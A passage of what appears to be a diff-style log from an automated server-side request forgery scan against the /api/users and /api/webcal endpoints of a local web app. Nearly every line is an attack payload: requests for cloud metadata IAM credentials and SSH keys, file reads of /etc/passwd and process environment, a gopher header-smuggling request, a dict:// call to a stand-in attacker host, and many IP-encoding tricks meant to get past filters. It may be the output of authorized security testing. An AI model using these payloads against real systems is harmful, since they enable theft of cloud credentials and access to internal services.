`http://localhost:4200/api/users?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/users?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/users?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/users?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/users?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/users?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/users?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/users?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/users?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/users?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/users?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/users?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/users?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/users?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/users?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/users?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/users?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/users?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/users?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/users?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/users?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/users?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/users?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/users?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/users?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/users?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/users?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/users?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/api/users?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/users?url=127.0.0.0` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/users?url=127.1.1.1` +- Testing: `http://localhost:4200/api/users?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/users?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/users?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/users?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/users?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/users?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/users?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/users?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/api/users?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/users?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/users?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/users?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/users?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/users?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/users?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/users?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/users?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/users?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/users?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/users?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/users?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/users?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/users?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/users?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/users?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/users?url=3232235521` +- Testing: `http://localhost:4200/api/users?url=3232235777` +- Testing: `http://localhost:4200/api/users?url=425.510.425.510` +- Testing: `http://localhost:4200/api/users?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/users?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/users?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/users?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/users?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/users?url=%5B%3A%3A%5D` +- Testing: `http://localhost:4200/api/users?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/users?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/api/users?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/users?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/users?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/users?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/users?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/users?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/users?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/users?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/users?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/users?url=instance-data` +- Testing: `http://localhost:4200/api/users?url=localhost%3A22` +- Testing: `http://localhost:4200/api/users?url=localhost%3A443` +- Testing: `http://localhost:4200/api/users?url=localhost%3A80` +- Testing: `http://localhost:4200/api/users?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/users?url=localhost%3A8000` +- Testing: `http://localhost:4200/api/users?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/users?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/users?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/users?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/users?url=loopback` +- Testing: `http://localhost:4200/api/users?url=loopback%3A22` +- Testing: `http://localhost:4200/api/users?url=loopback%3A80` +- Testing: `http://localhost:4200/api/users?url=loopback%3A443` +- Testing: `http://localhost:4200/api/users?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/users?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/users?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/users?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/users?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/users?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/users?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/users?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/users?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/users?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/users?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/users?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/users?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/users?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/users?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/users?url=127.1%3A80` +- Testing: `http://localhost:4200/api/users?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/users?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/users?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/users?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/users?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/users?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/users?url=2130706433%2F` +- Testing: `http://localhost:4200/api/users?url=3232235521%2F` +- Testing: `http://localhost:4200/api/users?url=3232235777%2F` +- Testing: `http://localhost:4200/api/users?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/users?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/users?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/users?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/users?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/users?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/users?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/users?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/users?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/users?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/users?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/users?url=0%2F` +- Testing: `http://localhost:4200/api/users?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/users?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/users?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/users?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/users?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` +## Testing endpoint: http://localhost:4200/api/webcal +- Testing: `http://localhost:4200/api/webcal?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/webcal?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/api/webcal?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/webcal?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/webcal?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/webcal?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/webcal?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/webcal?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/webcal?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/webcal?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/webcal?url=127.1%3A80` +- Testing: `http://localhost:4200/api/webcal?url=0` +- Testing: `http://localhost:4200/api/webcal?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A80` +- Testing: `http://localhost:4200/api/webcal?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/webcal?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/webcal?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/webcal?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/webcal?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/webcal?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/webcal?url=127.127.127.127` +- Testing: `http://localhost:4200/api/webcal?url=127.0.1.3` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.0` +- Testing: `http://localhost:4200/api/webcal?url=2130706433` +- Testing: `http://localhost:4200/api/webcal?url=017700000001` +- Testing: `http://localhost:4200/api/webcal?url=0x7f000001` +- Testing: `http://localhost:4200/api/webcal?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/webcal?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/webcal?url=` +- Testing: `http://localhost:4200/api/webcal?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/webcal?url=` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/webcal?url=` +- Testing: `http://localhost:4200/api/webcal?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/webcal?url=` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/webcal?url=` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/webcal?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/webcal?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/webcal?url=google.com.localhost` +- Testing: `http://localhost:4200/api/webcal?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/webcal?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/webcal?url=` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/webcal?url=` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/webcal?url=` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/webcal?url=localtest.me` +- Testing: `http://localhost:4200/api/webcal?url=http%3A%400%2F` +- Testing: `http://localhost:4200/api/webcal?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/webcal?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: `http://localhost:4200/api/webcal?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/api/webcal?url=2130706433%2F` +- Testing: `http://localhost:4200/api/webcal?url=3232235521%2F` +- Testing: `http://localhost:4200/api/webcal?url=3232235777%2F` +- Testing: `http://localhost:4200/api/webcal?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/webcal?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1` +- Testing: `http://localhost:4200/api/webcal?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/webcal?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/webcal?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/webcal?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/webcal?url=127.000000000000.1` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/webcal?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/webcal?url=0%2F` +- Testing: `http://localhost:4200/api/webcal?url=127.1` +- Testing: `http://localhost:4200/api/webcal?url=127.0.1` +- Testing: `http://localhost:4200/api/webcal?url=localtest.me` +- Testing: `http://localhost:4200/api/webcal?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/webcal?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/webcal?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/webcal?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/webcal?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/webcal?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/webcal?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/webcal?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/webcal?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/webcal?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/webcal?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/webcal?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/webcal?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/webcal?url=127.0.1.3` +- Testing: `http://localhost:4200/api/webcal?url=0` +- Testing: `http://localhost:4200/api/webcal?url=127.1` +- Testing: `http://localhost:4200/api/webcal?url=127.0.1` +- Testing: `http://localhost:4200/api/webcal?url=localhost` +- Testing: `http://localhost:4200/api/webcal?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/webcal?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/webcal?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/webcal?url=0177.0.0.01` +- Testing: `http://localhost:4200/api/webcal?url=7F000001` +- Testing: `http://localhost:4200/api/webcal?url=2130706433` +- Testing: `http://localhost:4200/api/webcal?url=6425673729` +- Testing: `http://localhost:4200/api/webcal?url=127001` +- Testing: `http://localhost:4200/api/webcal?url=127_0._0_1` +- Testing: `http://localhost:4200/api/webcal?url=0000%3A%3A1` +- Testing: `http://localhost:4200/api/webcal?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/api/webcal?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/webcal?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/webcal?url=localtest.me` +- Testing: `http://localhost:4200/api/webcal?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/webcal?url=127.127.127.127` +- Testing: `http://localhost:4200/api/webcal?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/webcal?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/webcal?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/webcal?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/webcal?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/webcal?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/webcal?url=0x7f000001` +- Testing: `http://localhost:4200/api/webcal?url=017700000001` +- Testing: `http://localhost:4200/api/webcal?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/webcal?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/webcal?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/webcal?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/webcal?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/webcal?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/webcal?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/webcal?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/webcal?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/webcal?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/webcal?url=169.254.169.254` +- Testing: `http://localhost:4200/api/webcal?url=2852039166` +- Testing: `http://localhost:4200/api/webcal?url=7147006462` +- Testing: `http://localhost:4200/api/webcal?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/webcal?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/webcal?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/webcal?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: `http://localhost:4200/api/webcal?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: 